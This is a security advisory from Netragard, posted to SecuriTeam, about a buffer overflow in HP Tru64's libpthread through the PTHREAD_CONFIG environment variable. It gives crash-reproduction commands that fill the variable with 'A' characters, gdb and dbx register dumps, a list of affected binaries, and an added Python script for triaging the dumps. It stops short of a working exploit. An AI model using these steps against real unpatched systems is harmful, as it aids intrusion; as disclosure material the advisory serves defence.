[UNIX] HP Tru64 libpthread Buffer Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



HP Tru64 libpthread Buffer Overflow
------------------------------------------------------------------------


SUMMARY

The pthread library (libpthread) provides "interfaces for developing
multi-threaded applications". libpthread suffers from a buffer overflow
vulnerability which may enable an attacker to execute arbitrary commands
on the system. This vulnerability may potentially be exploited by
creating a specially crafted buffer and inserting it into the
PTHREAD_CONFIG environment variable.

DETAILS

Vulnerable Systems:
* libpthread version 5.1b (HPUX)

libpthread reads in the PTHREAD_CONFIG environment variable. It may be
possible to exploit libpthread on HP's Tru64 by creating a specially
crafted buffer. The details below do not contain the specially crafted
buffer. Exploitation of this specific vulnerability is very difficult.

#############################################
#
# Insert 273 A's (0x41) into the PTHREAD_CONFIG variable
#
#############################################

OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)

#############################################
#
# Insert 274 A's (0x41) into the PTHREAD_CONFIG variable
#
#############################################

bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8 ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48 ra=0x3ff805c8bf8 inst=0xa5090028

#############################################
#
# Run newaliases in gdb with the -q flag.
#
#############################################

bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so

#############################################
#
# Execute a back trace (bt) within gdb
#
#############################################

(gdb) bt
#0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable). In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.

#############################################
#
# Execute Info Registers (i r) within gdb
#
#############################################

(gdb) i r
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x40 64
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x4141414141414141 4702111234474983745
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
a0 0xbf 191
a1 0x11fff9918 4831811864
a2 0x11fff96b0 4831811248
a3 0x11fff9b34 4831812404
a4 0x0 0
a5 0x11fff9b30 4831812400
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805c8bf8 4395905092600
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff98b0 4831811760
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805c8bf8 4395905092600
vfp 0x11fff9900 4831811840

frame 2
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x11fff9a50 4831812176
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x1 1
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1

###############################################
#
# The following registers, a0, a1, a2, a3, a4, a5, have been
# overwritten with A's (0x41).
#
###############################################

a0 0x4141414141414141 4702111234474983745
a1 0x4141414141414141 4702111234474983745
a2 0x4141414141414141 4702111234474983745
a3 0x4141414141414141 4702111234474983745
a4 0x4141414141414141 4702111234474983745
a5 0x4141414141414141 4702111234474983745
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805bc4f8 4395905041656
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff9a80 4831812224
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805bc4f8 4395905041656
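
The register dumps above can be triaged mechanically. The following Python
script is an added example, not part of the original advisory: it parses gdb
`info registers` lines, counts how many bytes of each register hold the 0x41
fill byte, and reports whether a control-flow register (pc, ra, sp, gp) was
wholly overwritten, which is the distinction behind the advisory's note that
exploitation is difficult. The two dumps embedded in it are constructed
excerpts of the frame 0 and frame 2 output shown above.

```python
import re
# Constructed sample input: excerpts of the Alpha `info registers` dumps from the
# advisory's gdb session (frame 0 in __putString, frame 2 in __utlOptManage).
FRAME0 = """\
s0 0x4141414141414141 4702111234474983745
a0 0xbf 191
ra 0x3ff805c8bf8 4395905092600
at 0x41416469 1094804585
sp 0x11fff98b0 4831811760
pc 0x3ff805c8bf8 4395905092600
"""
FRAME2 = """\
a0 0x4141414141414141 4702111234474983745
a1 0x4141414141414141 4702111234474983745
a5 0x4141414141414141 4702111234474983745
ra 0x3ff805bc4f8 4395905041656
at 0x41416469 1094804585
sp 0x11fff9a80 4831812224
pc 0x3ff805bc4f8 4395905041656
"""

REG_RE = re.compile(r"^\s*(\w+)\s+0x([0-9a-f]+)\s+\d+\s*$", re.I)
# Registers an attacker must control to redirect execution on Alpha.
CONTROL_REGS = {"pc", "ra", "sp", "gp"}

def parse_regs(dump):
    """Map register name -> integer value from a gdb `i r` dump."""
    regs = {}
    for line in dump.splitlines():
        m = REG_RE.match(line)
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    return regs

def marker_bytes(value, marker=0x41, width=8):
    """Bytes equal to the fill byte: 8 = full overwrite, 2 = partial (0x41416469)."""
    return sum(1 for b in value.to_bytes(width, "big") if b == marker)

def triage(dump, marker=0x41):
    """Return {register: tainted byte count} for every register touched by the fill."""
    counts = {n: marker_bytes(v, marker) for n, v in parse_regs(dump).items()}
    return {n: c for n, c in counts.items() if c}

def control_flow_tainted(dump, marker=0x41):
    """True only if a control-flow register was wholly replaced by the fill."""
    return any(c == 8 for r, c in triage(dump, marker).items() if r in CONTROL_REGS)

if __name__ == "__main__":
    for label, dump in (("frame 0", FRAME0), ("frame 2", FRAME2)):
        print(label, triage(dump), "control flow tainted:", control_flow_tainted(dump))
```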

############################################
#
# Other binaries which are linked against libpthread.so
# will also segfault when the PTHREAD_CONFIG variable
# is set to a large string of A's. The following is
# a list of some of those binaries
#
############################################

/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv

############################################
#
# Sendmail Example. Loading sendmail core file with
# the tru64 debugger.
#
############################################

bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"

warning: ./sendmail has no symbol table -- very little is
supported without it

signal Segmentation fault at >*[__putString, 0x3ff805c8bf8] ldq t0, 64(s0)
(dbx) where
0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918) [0x3ff805c8bf8]
1 __putFormatEol(0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141) [0x3ff805c8a74]
2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4, 0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4]

################################################
#
# Older versions are also vulnerable...
#
################################################

tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv

%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"

is not valid
Memory fault

Other binaries on 5.0
/usr/bin/ladebug


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@xxxxxxxxxxxxx>
Netragard Security Advisories.


